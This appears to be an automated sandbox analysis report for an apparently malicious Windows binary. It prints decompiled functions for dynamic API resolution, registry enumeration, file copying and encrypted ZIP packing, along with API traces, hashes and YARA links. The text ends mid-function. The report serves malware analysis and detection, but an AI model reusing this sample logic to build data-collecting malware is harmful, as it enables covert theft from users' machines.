Uniqueness

Uniqueness Score: -1.00%

Function 0040AF00, Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 106
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AF00(void* __ecx) {
				CHAR* _t2;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;
				_Unknown_base(*)()* _t5;
				struct HINSTANCE__* _t6;
				intOrPtr _t7;
				struct HINSTANCE__* _t9;
				CHAR* _t12;
				struct HINSTANCE__* _t14;
				CHAR* _t17;
				struct HINSTANCE__* _t19;
				CHAR* _t22;
				struct HINSTANCE__* _t24;
				CHAR* _t28;
				CHAR* _t29;
				struct HINSTANCE__* _t30;
				CHAR* _t31;
				struct HINSTANCE__* _t32;
				CHAR* _t33;
				struct HINSTANCE__* _t34;
				CHAR* _t35;
				struct HINSTANCE__* _t36;
				CHAR* _t37;
				struct HINSTANCE__* _t38;
				CHAR* _t39;
				intOrPtr _t40;
				struct HINSTANCE__* _t41;
				CHAR* _t42;
				struct HINSTANCE__* _t43;
				CHAR* _t44;
				struct HINSTANCE__* _t45;
				CHAR* _t46;
				struct HINSTANCE__* _t47;

				 *0x417a30 = E0040ADE0(__ecx);
				if( *0x417a30 != 0) {
					_t7 =  *0x4171f0; // 0x413068
					_t30 =  *0x417a30; // 0x73b60000
					 *0x4179e8 = E0040AE10(_t30, _t7);
					_t40 =  *0x41746c; // 0x413078
					_t9 =  *0x417a30; // 0x73b60000
					 *0x41794c = E0040AE10(_t9, _t40);
					_t31 =  *0x417708; // 0x4130b0
					_t41 =  *0x417a30; // 0x73b60000
					 *0x417a54 = GetProcAddress(_t41, _t31);
					_t12 =  *0x417338; // 0x4130c0
					_t32 =  *0x417a30; // 0x73b60000
					 *0x417878 = GetProcAddress(_t32, _t12);
					_t42 =  *0x4175b0; // 0x4130c8
					_t14 =  *0x417a30; // 0x73b60000
					 *0x417a34 = GetProcAddress(_t14, _t42);
					_t33 =  *0x4174a8; // 0x4130e0
					_t43 =  *0x417a30; // 0x73b60000
					 *0x4179a0 = GetProcAddress(_t43, _t33);
					_t17 =  *0x4174c0; // 0x4130f0
					_t34 =  *0x417a30; // 0x73b60000
					 *0x4179b8 = GetProcAddress(_t34, _t17);
					_t44 =  *0x4177c4; // 0x413088
					_t19 =  *0x417a30; // 0x73b60000
					 *0x417960 = GetProcAddress(_t19, _t44);
					_t35 =  *0x417320; // 0x413100
					_t45 =  *0x417a30; // 0x73b60000
					 *0x4179d8 = GetProcAddress(_t45, _t35);
					_t22 =  *0x4176e0; // 0x41310c
					_t36 =  *0x417a30; // 0x73b60000
					 *0x417a44 = GetProcAddress(_t36, _t22);
					_t46 =  *0x4177a0; // 0x41311c
					_t24 =  *0x417a30; // 0x73b60000
					 *0x4179c8 = GetProcAddress(_t24, _t46);
					_t37 =  *0x41740c; // 0x413130
					_t47 =  *0x417a30; // 0x73b60000
					 *0x4178b8 = GetProcAddress(_t47, _t37);
				}
				_t2 =  *0x4170f8; // 0x413094
				_t3 = LoadLibraryA(_t2); // executed
				 *0x417844 = _t3;
				_t28 =  *0x417648; // 0x4130a4
				_t4 = LoadLibraryA(_t28); // executed
				 *0x417910 = _t4;
				if( *0x417844 != 0) {
					_t39 =  *0x417588; // 0x413140
					_t6 =  *0x417844; // 0x73ae0000
					_t4 = GetProcAddress(_t6, _t39);
					 *0x417920 = _t4;
				}
				if( *0x417910 != 0) {
					_t29 =  *0x4170b8; // 0x413150
					_t38 =  *0x417910; // 0x76ae0000
					_t5 = GetProcAddress(_t38, _t29);
					 *0x4179b4 = _t5;
					return _t5;
				}
				return _t4;
			}

0x0040af08
0x0040af14
0x0040af1a
0x0040af20
0x0040af2f
0x0040af34
0x0040af3b
0x0040af49
0x0040af4e
0x0040af55
0x0040af62
0x0040af67
0x0040af6d
0x0040af7a
0x0040af7f
0x0040af86
0x0040af92
0x0040af97
0x0040af9e
0x0040afab
0x0040afb0
0x0040afb6
0x0040afc3
0x0040afc8
0x0040afcf
0x0040afdb
0x0040afe0
0x0040afe7
0x0040aff4
0x0040aff9
0x0040afff
0x0040b00c
0x0040b011
0x0040b018
0x0040b024
0x0040b029
0x0040b030
0x0040b03d
0x0040b03d
0x0040b042
0x0040b048
0x0040b04e
0x0040b053
0x0040b05a
0x0040b060
0x0040b06c
0x0040b06e
0x0040b075
0x0040b07b
0x0040b081
0x0040b081
0x0040b08d
0x0040b08f
0x0040b096
0x0040b09d
0x0040b0a3
0x00000000
0x0040b0a3
0x0040b0a9

APIs

GetProcAddress.KERNEL32(73B60000,004130B0), ref: 0040AF5C
GetProcAddress.KERNEL32(73B60000,004130C0), ref: 0040AF74
GetProcAddress.KERNEL32(73B60000,004130C8), ref: 0040AF8C
GetProcAddress.KERNEL32(73B60000,004130E0), ref: 0040AFA5
GetProcAddress.KERNEL32(73B60000,004130F0), ref: 0040AFBD
GetProcAddress.KERNEL32(73B60000,00413088), ref: 0040AFD5
GetProcAddress.KERNEL32(73B60000,00413100), ref: 0040AFEE
GetProcAddress.KERNEL32(73B60000,0041310C), ref: 0040B006
GetProcAddress.KERNEL32(73B60000,0041311C), ref: 0040B01E
GetProcAddress.KERNEL32(73B60000,00413130), ref: 0040B037
LoadLibraryA.KERNEL32(00413094,?,004057FD), ref: 0040B048
LoadLibraryA.KERNEL32(004130A4,?,004057FD), ref: 0040B05A
GetProcAddress.KERNEL32(73AE0000,00413140), ref: 0040B07B
GetProcAddress.KERNEL32(76AE0000,00413150), ref: 0040B09D

Strings

01A, xrefs: 0040B029
h0A, xrefs: 0040AF1A
@1A, xrefs: 0040B06E
P1A, xrefs: 0040B08F
x0A, xrefs: 0040AF34
0A, xrefs: 0040AF97

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$LibraryLoad
String ID: 01A$@1A$P1A$h0A$x0A$0A
API String ID: 2238633743-53409171
Opcode ID: aeb4ea4fe60c0573a4d5cf8b4dc4b2413da2d1b9753ae079afeac60c672396f8
Instruction ID: 2219de5ce30a6a369e139289992425ff4bbb77474a8aa57d17f5bfba12bb5546
Opcode Fuzzy Hash: aeb4ea4fe60c0573a4d5cf8b4dc4b2413da2d1b9753ae079afeac60c672396f8
Instruction Fuzzy Hash: D74193F55A92009FD344EFA8EE889EA3BFABB4C351704D539A50AC3660D7349544CFAC

Uniqueness

Uniqueness Score: -1.00%

Function 00406840, Relevance: 31.7, APIs: 21, Instructions: 174stringfileCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,?,0040762E,00000000,?,?,?,B0A), ref: 00406859
lstrcat.KERNEL32(?,00413040), ref: 0040686B

Part of subcall function 0040A400: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040A421

lstrcat.KERNEL32(?,00000000), ref: 00406883
CopyFileA.KERNEL32(?,?,00000001), ref: 00406896
DeleteFileA.KERNEL32(?), ref: 00406ABC

Part of subcall function 00405FF0: memset.MSVCRT ref: 00406042
Part of subcall function 00405FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00406091
Part of subcall function 00405FF0: lstrcat.KERNEL32(?,00000000), ref: 004060F7

lstrcat.KERNEL32(?,00000000), ref: 00406977
lstrcat.KERNEL32(00000000,00BB2E40), ref: 0040698B
lstrcat.KERNEL32(00000000,?), ref: 0040699C
lstrcat.KERNEL32(00000000,004165A0), ref: 004069AE
lstrcat.KERNEL32(00000000,00BB2DE0), ref: 004069C1
lstrcat.KERNEL32(00000000,?), ref: 004069D1
lstrcat.KERNEL32(00000000,004165A0), ref: 004069E3
lstrcat.KERNEL32(00000000,00BB2E50), ref: 004069F6
lstrcat.KERNEL32(00000000,?), ref: 00406A0A
lstrcat.KERNEL32(00000000,004165A0), ref: 00406A1B
lstrcat.KERNEL32(00000000,00BB2D70), ref: 00406A2F
lstrcat.KERNEL32(00000000,?), ref: 00406A43
lstrcat.KERNEL32(00000000,004165A0), ref: 00406A55
lstrcat.KERNEL32(00000000,00BB2DF0), ref: 00406A68
lstrcat.KERNEL32(00000000,?), ref: 00406A7B
lstrcat.KERNEL32(00000000,0041659C), ref: 00406A8D

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$File$AllocCopyCurrentDeleteDirectoryLocalSystemTimememset
String ID:
API String ID: 3522136165-0
Opcode ID: c9acba91ee0ba351705298f2f058c9a52e0824d23a8bce5c4f974bef9f47093c
Instruction ID: 3445330b2c7ef7ee7efeca8a52203c63b20ef4d73280cdef4493f72ce49ac355
Opcode Fuzzy Hash: c9acba91ee0ba351705298f2f058c9a52e0824d23a8bce5c4f974bef9f47093c
Instruction Fuzzy Hash: 146171F1994215AFDB10EBA4EC4CDEA37B8FB4C311F018568F60997260D675EA84CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00409E60, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 129
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00409E60(intOrPtr _a4) {
				int _v8;
				char _v1036;
				char _v2060;
				void* _v2064;
				void* _v2068;
				int* _v2072;
				int _v2076;
				char _v3100;
				int _v3104;
				long _t44;
				long _t48;
				long _t51;
				long _t54;
				long _t60;
				char* _t69;
				char* _t77;
				char* _t84;
				char* _t87;
				void* _t92;

				_v2068 = 0;
				_v2064 = 0;
				_v2072 = 0;
				_v8 = 0xf003f;
				_v2076 = 0;
				_t69 =  *0x417230; // 0xbd2958
				_t44 = RegOpenKeyExA(0x80000002, _t69, 0, 0x20019,  &_v2068); // executed
				if(_t44 == 0) {
					_v3104 = 0;
					while(_v2072 == 0) {
						_v2076 = 0x400;
						_t48 = RegEnumKeyExA(_v2068, _v3104,  &_v1036,  &_v2076, 0, 0, 0, 0); // executed
						_v2072 = _t48;
						if(_v2072 != 0) {
							L14:
							_v3104 = _v3104 + 1;
							continue;
						}
						_push( &_v1036);
						_t84 =  *0x417230; // 0xbd2958
						_push(_t84);
						wsprintfA( &_v2060, "%s\%s");
						_t92 = _t92 + 0x10;
						_t51 = RegOpenKeyExA(0x80000002,  &_v2060, 0, 0x20019,  &_v2064); // executed
						if(_t51 == 0) {
							_v2076 = 0x400;
							_t87 =  *0x41770c; // 0xbc8ba0
							_t54 = RegQueryValueExA(_v2064, _t87, 0,  &_v8,  &_v3100,  &_v2076); // executed
							if(_t54 == 0) {
								_push( &_v3100);
								if( *0x4178e4() > 1) {
									 *0x4179f8(_a4,  &_v3100);
									_v2076 = 0x400;
									_t77 =  *0x417448; // 0xbc8bb8
									_t60 = RegQueryValueExA(_v2064, _t77, 0,  &_v8,  &_v3100,  &_v2076); // executed
									if(_t60 == 0) {
										 *0x4179f8(_a4, " ");
										 *0x4179f8(_a4,  &_v3100);
									}
									 *0x4179f8(_a4, "\n");
								}
							}
							RegCloseKey(_v2064);
							goto L14;
						}
						RegCloseKey(_v2064);
						return RegCloseKey(_v2068);
					}
					return RegCloseKey(_v2068);
				}
				return _t44;
			}

0x00409e69
0x00409e73
0x00409e7d
0x00409e87
0x00409e8e
0x00409ea6
0x00409eb2
0x00409eba
0x00409ec1
0x00409edc
0x00409ee9
0x00409f17
0x00409f1d
0x00409f2a
0x0040a065
0x00409ed6
0x00000000
0x00409ed6
0x00409f36
0x00409f37
0x00409f3d
0x00409f4a
0x00409f50
0x00409f6d
0x00409f75
0x00409f96
0x00409fb4
0x00409fc2
0x00409fca
0x00409fd6
0x00409fe0
0x00409fed
0x00409ff3
0x0040a011
0x0040a01f
0x0040a027
0x0040a032
0x0040a043
0x0040a043
0x0040a052
0x0040a052
0x00409fe0
0x0040a05f
0x00000000
0x0040a05f
0x00409f7e
0x00000000
0x00409f8b
0x00000000
0x0040a071
0x00000000

APIs

RegOpenKeyExA.KERNEL32(80000002,00BD2958,00000000,00020019,00000000), ref: 00409EB2
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00409F17
wsprintfA.USER32 ref: 00409F4A
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020019,00000000), ref: 00409F6D
RegCloseKey.ADVAPI32(00000000), ref: 00409F7E
RegCloseKey.ADVAPI32(00000000), ref: 00409F8B

Strings

?, xrefs: 00409E87
%s\%s, xrefs: 00409F3E

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseOpen$Enumwsprintf
String ID: %s\%s$?
API String ID: 2323328657-4134130046
Opcode ID: bc3f784b0550100fb72f9f77453315b5e18285b96fb78c373720a41797596779
Instruction ID: fae947d965626cf2ca83c4cdb7b2caf1963fc8bf8ea113c0eaebf3a10c35e35a
Opcode Fuzzy Hash: bc3f784b0550100fb72f9f77453315b5e18285b96fb78c373720a41797596779
Instruction Fuzzy Hash: EF5120B591421CABEB20DF50CC49FDA77B8BB04304F00C5A9B249A6181DF749AC9CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 00407060, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 155stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040708F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004070DF
RtlAllocateHeap.NTDLL(00000000), ref: 004070E6
lstrcat.KERNEL32(?,00BBBAE0), ref: 00407161

Part of subcall function 00405FF0: memset.MSVCRT ref: 00406042
Part of subcall function 00405FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00406091
Part of subcall function 00405FF0: lstrcat.KERNEL32(?,00000000), ref: 004060F7

lstrcat.KERNEL32(?,00000000), ref: 004071A5
lstrcat.KERNEL32(?,00BB95B0), ref: 004071B8
lstrcat.KERNEL32(?,?), ref: 004071CC
lstrcat.KERNEL32(?,00BB9610), ref: 004071E0
lstrcat.KERNEL32(?,?), ref: 004071F4
lstrcat.KERNEL32(?,00416BB8), ref: 00407206
lstrcat.KERNEL32(?,?), ref: 0040721A
lstrcat.KERNEL32(?,0041659C), ref: 0040722C
lstrlen.KERNEL32(?), ref: 0040723E

Strings

Ow@, xrefs: 00407253, 00407256

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Heap$AllocAllocateLocalProcesslstrlenmemsetwsprintf
String ID: Ow@
API String ID: 2806430148-2451946830
Opcode ID: 4594ab2353a4a844af2b6401c7bb4460bff6ef31e0df36fa72388f988ce5dcd5
Instruction ID: e44677002c0e3b25c1c9b14865655f6a46ae9e3c0fb3c8402c8b134ff83befa2
Opcode Fuzzy Hash: 4594ab2353a4a844af2b6401c7bb4460bff6ef31e0df36fa72388f988ce5dcd5
Instruction Fuzzy Hash: B651A3F1904218ABCB14DFA4DC4AEDA7778AF48701F0085A8F719D7250DA35AE90CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411470, Relevance: 18.2, APIs: 7, Strings: 3, Instructions: 688
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411470(signed int* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v29;
				signed int _v30;
				char _v44;
				char _v308;
				void* _v312;
				signed int _v313;
				signed int _v320;
				void* _v324;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				signed int _v352;
				signed int _v356;
				signed int _v364;
				char _v624;
				char _v884;
				signed int _v888;
				void* _v892;
				signed int _v896;
				char _v1156;
				intOrPtr _v1160;
				signed int _v1164;
				short _v1168;
				short _v1170;
				short _v1172;
				signed int _v1176;
				int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				unsigned int _v1204;
				signed int _v1206;
				signed int _v1208;
				short _v1210;
				void _v1212;
				signed int _v1216;
				char* _v1220;
				signed char* _v1224;
				signed int _v1228;
				signed int _v1232;
				signed int _v1236;
				void* _v1240;
				void* _v1244;
				signed int* _v1248;
				intOrPtr* _v1252;
				char* _v1256;
				intOrPtr _v1260;
				char _v1261;
				intOrPtr* _v1268;
				signed int _v1272;
				char _v1273;
				intOrPtr _v1280;
				signed int _v1284;
				intOrPtr* _v1288;
				char* _v1292;
				intOrPtr _v1296;
				char _v1297;
				intOrPtr* _v1304;
				signed int _v1308;
				char _v1309;
				signed int _v1316;
				signed int _v1320;
				char _v1321;
				signed int _v1328;
				signed int _v1332;
				char _t427;
				signed int _t461;
				signed int _t464;
				signed int* _t467;
				signed char _t503;
				signed char _t507;
				signed int _t515;
				signed char _t521;
				signed int _t523;
				signed int _t527;
				signed int _t542;
				signed char _t548;
				signed int _t551;
				signed int* _t559;
				char _t574;
				intOrPtr* _t596;
				signed int* _t611;
				signed int _t619;
				signed int _t630;
				signed int _t637;
				signed int _t643;
				signed int* _t647;
				intOrPtr _t656;
				signed int _t669;
				signed int* _t710;
				signed int _t719;
				signed int* _t720;
				signed int* _t723;
				signed int _t737;
				signed int _t742;
				char _t743;
				int _t759;
				void* _t760;
				void* _t761;
				void* _t762;

				_v1248 = __ecx;
				if(_v1248[5] == 0) {
					_t559 = _v1248;
					__eflags =  *(_t559 + 0x2c) & 0x000000ff;
					if(( *(_t559 + 0x2c) & 0x000000ff) == 0) {
						_v320 = 0;
						__eflags =  *_v1248;
						if( *_v1248 != 0) {
							__eflags = _a16 - 4;
							if(_a16 != 4) {
								_v320 = 0xc;
							}
						}
						_v1252 = _a4;
						_v1256 =  &_v308;
						_v1260 = _v1256;
						do {
							_v1261 =  *_v1252;
							 *_v1256 = _v1261;
							_v1252 = _v1252 + 1;
							_v1256 = _v1256 + 1;
							__eflags = _v1261;
						} while (_v1261 != 0);
						__eflags = _v308;
						if(_v308 != 0) {
							_v1220 =  &_v308;
							while(1) {
								__eflags =  *_v1220;
								if( *_v1220 == 0) {
									break;
								}
								__eflags =  *_v1220 - 0x5c;
								if( *_v1220 == 0x5c) {
									 *_v1220 = 0x2f;
								}
								_v1220 = _v1220 + 1;
							}
							__eflags = _a16 - 4;
							_v29 = 0 | _a16 == 0x00000004;
							__eflags = _v29 & 0x000000ff;
							if((_v29 & 0x000000ff) == 0) {
								L21:
								_v1284 = 0;
								L22:
								_v30 = _v1284;
								_v28 = 8;
								__eflags = _v29 & 0x000000ff;
								if((_v29 & 0x000000ff) != 0) {
									L24:
									_v28 = 0;
									L25:
									__eflags = _a16 - 2;
									if(_a16 != 2) {
										__eflags = _a16 - 1;
										if(_a16 != 1) {
											__eflags = _a16 - 3;
											if(_a16 != 3) {
												__eflags = _a16 - 4;
												if(__eflags != 0) {
													return 0x10000;
												}
												_v24 = E00410F70(_v1248, __eflags);
												L34:
												__eflags = _v24;
												if(_v24 == 0) {
													_v352 = 0;
													_t427 =  *0x413042; // 0x0
													_v1156 = _t427;
													_v1288 =  &_v308;
													_v1292 =  &_v884;
													_v1296 = _v1292;
													do {
														_v1297 =  *_v1288;
														 *_v1292 = _v1297;
														_v1288 = _v1288 + 1;
														_v1292 = _v1292 + 1;
														__eflags = _v1297;
													} while (_v1297 != 0);
													_v1304 =  &_v884;
													_t669 = _v1304 + 1;
													__eflags = _t669;
													_v1308 = _t669;
													do {
														_v1309 =  *_v1304;
														_v1304 = _v1304 + 1;
														__eflags = _v1309;
													} while (_v1309 != 0);
													_v1316 = _v1304 - _v1308;
													_v1188 = _v1316;
													__eflags = _v30 & 0x000000ff;
													if((_v30 & 0x000000ff) == 0) {
														L44:
														_t574 =  *0x413042; // 0x0
														_v624 = _t574;
														_v896 = 0;
														_v1184 = 0;
														_v892 = 0;
														_v1180 = 0;
														_v888 = 0;
														_v1176 = 0;
														_v364 = 1;
														_v356 = 0;
														_v1170 = 0;
														_v1212 = 0xb17;
														_v1210 = 0x14;
														_v1204 = _v1248[0x1a];
														_v1200 = 0;
														_v1208 = 8;
														__eflags =  *_v1248;
														if( *_v1248 != 0) {
															__eflags = _v29 & 0x000000ff;
															if((_v29 & 0x000000ff) == 0) {
																_v1208 = 9;
															}
														}
														_v1168 = _v1208;
														_v1206 = _v28;
														__eflags = _v28;
														if(_v28 != 0) {
															L50:
															_v1328 = 0;
															goto L51;
														} else {
															_t647 = _v1248;
															__eflags =  *(_t647 + 0x70);
															if( *(_t647 + 0x70) < 0) {
																goto L50;
															}
															_v1328 = _v1248[0x1c] + _v320;
															L51:
															_v1196 = _v1328;
															_v1192 = _v1248[0x1c];
															_v1172 = 0;
															_v1164 = _v1248[0x13];
															_v1160 = _v1248[6] + _v1248[4];
															_v896 =  &_v344;
															_v1184 = 0x11;
															_v892 =  &_v44;
															_v1180 = 9;
															_v344 = 0x55;
															_v343 = 0x54;
															_v342 = 0xd;
															_v341 = 0;
															_v340 = 7;
															_v339 = _v1248[0x16];
															_v338 = E00412590(_v1248[0x16], 8, _v1248[0x17]);
															_v337 = E00412590(_v1248[0x16], 0x10, _v1248[0x17]);
															_v336 = E00412590(_v1248[0x16], 0x18, _v1248[0x17]);
															_v335 = _v1248[0x14];
															_v334 = E00412590(_v1248[0x14], 8, _v1248[0x15]);
															_v333 = E00412590(_v1248[0x14], 0x10, _v1248[0x15]);
															_v332 = E00412590(_v1248[0x14], 0x18, _v1248[0x15]);
															_v331 = _v1248[0x18];
															_v330 = E00412590(_v1248[0x18], 8, _v1248[0x19]);
															_v329 = E00412590(_v1248[0x18], 0x10, _v1248[0x19]);
															_v328 = E00412590(_v1248[0x18], 0x18, _v1248[0x19]);
															_t461 = _v896;
															_t596 = _v892;
															 *_t596 =  *_t461;
															 *((intOrPtr*)(_t596 + 4)) =  *((intOrPtr*)(_t461 + 4));
															 *((char*)(_t596 + 8)) =  *((intOrPtr*)(_t461 + 8));
															 *((char*)(_v892 + 2)) = 5;
															_t464 = E0040EF50( &_v1212, E00410920, _v1248);
															_t762 = _t761 + 0xc;
															_v1216 = _t464;
															__eflags = _v1216;
															if(_v1216 == 0) {
																_v1248[6] = _v1188 + _v1184 + 0x1e + _v1248[6];
																_t467 = _v1248;
																__eflags =  *(_t467 + 0x14);
																if( *(_t467 + 0x14) == 0) {
																	_v1248[0xc] = 0x12345678;
																	_v1248[0xd] = 0x23456789;
																	_v1248[0xe] = 0x34567890;
																	_v1224 =  *_v1248;
																	while(1) {
																		__eflags = _v1224;
																		if(_v1224 == 0) {
																			break;
																		}
																		__eflags =  *_v1224;
																		if( *_v1224 == 0) {
																			break;
																		}
																		E0040FF90( &(_v1248[0xc]),  *_v1224 & 0x000000ff);
																		_t762 = _t762 + 8;
																		_t643 =  &(_v1224[1]);
																		__eflags = _t643;
																		_v1224 = _t643;
																	}
																	__eflags =  *0x417c2c & 0x000000ff;
																	if(( *0x417c2c & 0x000000ff) == 0) {
																		_t527 = GetTickCount();
																		_t759 = _t527 ^ GetDesktopWindow();
																		__eflags = _t759;
																		srand(_t759);
																		_t762 = _t762 + 4;
																	}
																	_v1228 = 0;
																	while(1) {
																		__eflags = _v1228 - 0xc;
																		if(_v1228 >= 0xc) {
																			break;
																		}
																		 *((char*)(_t760 + _v1228 - 0x10)) = rand() >> 0x00000007 & 0x000000ff;
																		_t737 = _v1228 + 1;
																		__eflags = _t737;
																		_v1228 = _t737;
																	}
																	_v9 = _v1204 >> 0x00000008 & 0x000000ff;
																	_v1232 = 0;
																	while(1) {
																		__eflags = _v1232 - 0xc;
																		if(__eflags >= 0) {
																			break;
																		}
																		_t521 = E00410040(_v1232, __eflags,  &(_v1248[0xc]),  *(_t760 + _v1232 - 0x10) & 0x000000ff);
																		_t762 = _t762 + 8;
																		 *(_t760 + _v1232 - 0x10) = _t521;
																		_t523 = _v1232 + 1;
																		__eflags = _t523;
																		_v1232 = _t523;
																	}
																	__eflags =  *_v1248;
																	if( *_v1248 != 0) {
																		__eflags = _v29 & 0x000000ff;
																		if((_v29 & 0x000000ff) == 0) {
																			E00410920( &_v20, _v1248,  &_v20, 0xc);
																			_t762 = _t762 + 0xc;
																			_t637 = _v1248[6] + 0xc;
																			__eflags = _t637;
																			_v1248[6] = _t637;
																		}
																	}
																	_v8 = 0;
																	__eflags =  *_v1248;
																	if( *_v1248 == 0) {
																		L76:
																		_v1332 = 0;
																		goto L77;
																	} else {
																		__eflags = _v29 & 0x000000ff;
																		if((_v29 & 0x000000ff) != 0) {
																			goto L76;
																		}
																		_v1332 = 1;
																		L77:
																		_v1248[0xb] = _v1332;
																		__eflags = _v29 & 0x000000ff;
																		if((_v29 & 0x000000ff) != 0) {
																			L80:
																			__eflags = _v29 & 0x000000ff;
																			if((_v29 & 0x000000ff) != 0) {
																				L83:
																				__eflags = _v29 & 0x000000ff;
																				if((_v29 & 0x000000ff) != 0) {
																					_v1248[0x24] = 0;
																				}
																				L85:
																				_v1248[0xb] = 0;
																				E004111D0(_v1248);
																				_v1248[6] = _v1248[6] + _v1248[0x24];
																				_t710 = _v1248;
																				__eflags =  *(_t710 + 0x14);
																				if( *(_t710 + 0x14) == 0) {
																					__eflags = _v8;
																					if(_v8 == 0) {
																						__eflags = _v1196 - _v1248[0x24] + _v320;
																						_v313 = 0 | _v1196 == _v1248[0x24] + _v320;
																						_v1200 = _v1248[0x1e];
																						_v1196 = _v1248[0x24] + _v320;
																						_v1192 = _v1248[0x1c];
																						_t611 = _v1248;
																						__eflags =  *(_t611 + 0x1c) & 0x000000ff;
																						if(( *(_t611 + 0x1c) & 0x000000ff) == 0) {
																							L101:
																							__eflags = (_v1206 & 0x0000ffff) - (_v28 & 0x0000ffff);
																							if((_v1206 & 0x0000ffff) == (_v28 & 0x0000ffff)) {
																								__eflags = _v28;
																								if(_v28 != 0) {
																									L106:
																									_v1216 = E0040F360( &_v1212, E00410920, _v1248);
																									__eflags = _v1216;
																									if(_v1216 == 0) {
																										_t719 = _v1248[6] + 0x10;
																										__eflags = _t719;
																										_v1248[6] = _t719;
																										_v1208 = _v1168;
																										L109:
																										_t720 = _v1248;
																										__eflags =  *(_t720 + 0x14);
																										if( *(_t720 + 0x14) == 0) {
																											_v1240 = E0040A0E0(_v1180, _v1180);
																											_v312 = _v1240;
																											memcpy(_v312, _v892, _v1180);
																											_v892 = _v312;
																											_v1244 = E0040A0E0(_v892, 0x360);
																											_v324 = _v1244;
																											memcpy(_v324,  &_v1212, 0xd8 << 2);
																											_t723 = _v1248;
																											__eflags =  *(_t723 + 0x44);
																											if( *(_t723 + 0x44) != 0) {
																												_v1236 = _v1248[0x11];
																												while(1) {
																													_t619 = _v1236;
																													__eflags =  *(_t619 + 0x35c);
																													if( *(_t619 + 0x35c) == 0) {
																														break;
																													}
																													_v1236 =  *((intOrPtr*)(_v1236 + 0x35c));
																												}
																												 *((intOrPtr*)(_v1236 + 0x35c)) = _v324;
																												L117:
																												__eflags = 0;
																												return 0;
																											}
																											_v1248[0x11] = _v324;
																											goto L117;
																										}
																										return _v1248[5];
																									}
																									return 0x400;
																								}
																								__eflags = _v313 & 0x000000ff;
																								if((_v313 & 0x000000ff) != 0) {
																									goto L106;
																								}
																								return 0x4000000;
																							}
																							return 0x4000000;
																						}
																						__eflags =  *_v1248;
																						if( *_v1248 == 0) {
																							L92:
																							_v1206 = _v28;
																							__eflags = _v1208 & 1;
																							if((_v1208 & 1) == 0) {
																								_t630 = _v1208 & 0xfff7;
																								__eflags = _t630;
																								_v1208 = _t630;
																							}
																							_v1168 = _v1208;
																							_t503 = E00410AD0(_v1248, _v1160 - _v1248[4]);
																							__eflags = _t503 & 0x000000ff;
																							if((_t503 & 0x000000ff) != 0) {
																								_v1216 = E0040EF50( &_v1212, E00410920, _v1248);
																								__eflags = _v1216;
																								if(_v1216 == 0) {
																									_t507 = E00410AD0(_v1248, _v1248[6]);
																									__eflags = _t507 & 0x000000ff;
																									if((_t507 & 0x000000ff) != 0) {
																										goto L109;
																									}
																									return 0x2000000;
																								}
																								return 0x400;
																							} else {
																								return 0x2000000;
																							}
																						}
																						__eflags = _v29 & 0x000000ff;
																						if((_v29 & 0x000000ff) == 0) {
																							goto L101;
																						}
																						goto L92;
																					}
																					return 0x400;
																				}
																				return _v1248[5];
																			}
																			__eflags = _v28;
																			if(__eflags != 0) {
																				goto L83;
																			}
																			_v8 = E004113F0(_v1248, __eflags);
																			goto L85;
																		}
																		__eflags = _v28 - 8;
																		if(_v28 != 8) {
																			goto L80;
																		}
																		_t515 = E00411260(_v1248,  &_v1212); // executed
																		_v8 = _t515;
																		goto L85;
																	}
																}
																E004111D0(_v1248);
																return _v1248[5];
															}
															E004111D0(_v1248);
															return 0x400;
														}
													}
													_t742 =  &_v884 + 0xffffffff;
													__eflags = _t742;
													_v1320 = _t742;
													do {
														_v1321 =  *((intOrPtr*)(_v1320 + 1));
														_v1320 = _v1320 + 1;
														__eflags = _v1321;
													} while (_v1321 != 0);
													_t743 = "/"; // 0x2f
													 *_v1320 = _t743;
													_t542 = _v1188 + 1;
													__eflags = _t542;
													_v1188 = _t542;
													goto L44;
												}
												return _v24;
											}
											_v24 = E00410E40(_v1248, _a8, _a12);
											goto L34;
										}
										_v24 = E00410C90(_v1248, _a8, _a12);
										goto L34;
									}
									_v24 = E00410BC0(_v1248, _a8);
									goto L34;
								}
								_t548 = E00410080( &_v308);
								_t761 = _t761 + 4;
								__eflags = _t548 & 0x000000ff;
								if((_t548 & 0x000000ff) == 0) {
									goto L25;
								}
								goto L24;
							}
							_v1268 =  &_v308;
							_t551 = _v1268 + 1;
							__eflags = _t551;
							_v1272 = _t551;
							do {
								_v1273 =  *_v1268;
